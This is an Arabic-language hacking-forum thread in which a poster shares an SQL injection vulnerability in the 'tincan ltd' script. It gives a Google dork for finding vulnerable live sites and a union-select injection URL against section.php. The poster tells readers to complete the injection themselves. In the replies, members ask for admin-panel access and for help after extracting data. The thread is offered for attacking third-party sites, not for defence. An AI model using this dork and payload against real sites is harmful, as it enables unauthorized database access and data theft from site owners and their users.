السلام عليكم ورحمة الله وبركاته جبت لكم اليوم ثغرة في سكريبت tincan ltd الثغرة من نوع SQL INJECTION الذي يعشقها الكثير نبدأ دورك البحث عن...

M!M0

New Member
ثغرة في سكريبت tincan ltd
السلام عليكم ورحمة الله وبركاته

جبت لكم اليوم ثغرة في سكريبت tincan ltd

الثغرة من نوع SQL INJECTION

الذي يعشقها الكثير

نبدأ

دورك البحث عن المواقع المصابة

PHP:
DorK : intext:'powered by tincan ltd' and  inurl:"section.php?section=9"

طريقة الإستغلال

PHP:
http://server/section.php?section=9&topic=6+union+select+1,2,3,version(),5--

ذي المرة أنتم أكملو الحقن بأنفسكم




الثغرة من إكتشاف

altbta
 

KaLa$nikoV

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
ثغرة في سكريبت tincan ltd
شكرا لك كثيرا ع الثغره


لو كان في لوحه ادمن كان افضل :)


يلا ع كل حال مشكور
 

M!M0

New Member
ثغرة في سكريبت tincan ltd
مشكووورين على المرور

نعم لو كانت معها لوحة التحكم أفضل
 

MouDaMiR

New Member
ثغرة في سكريبت tincan ltd
لاني استخرجت المعلومات لكن بدون فايدةة...المرجوا من اصخاب الخبر المساعد..و شكرااا
 
أعلى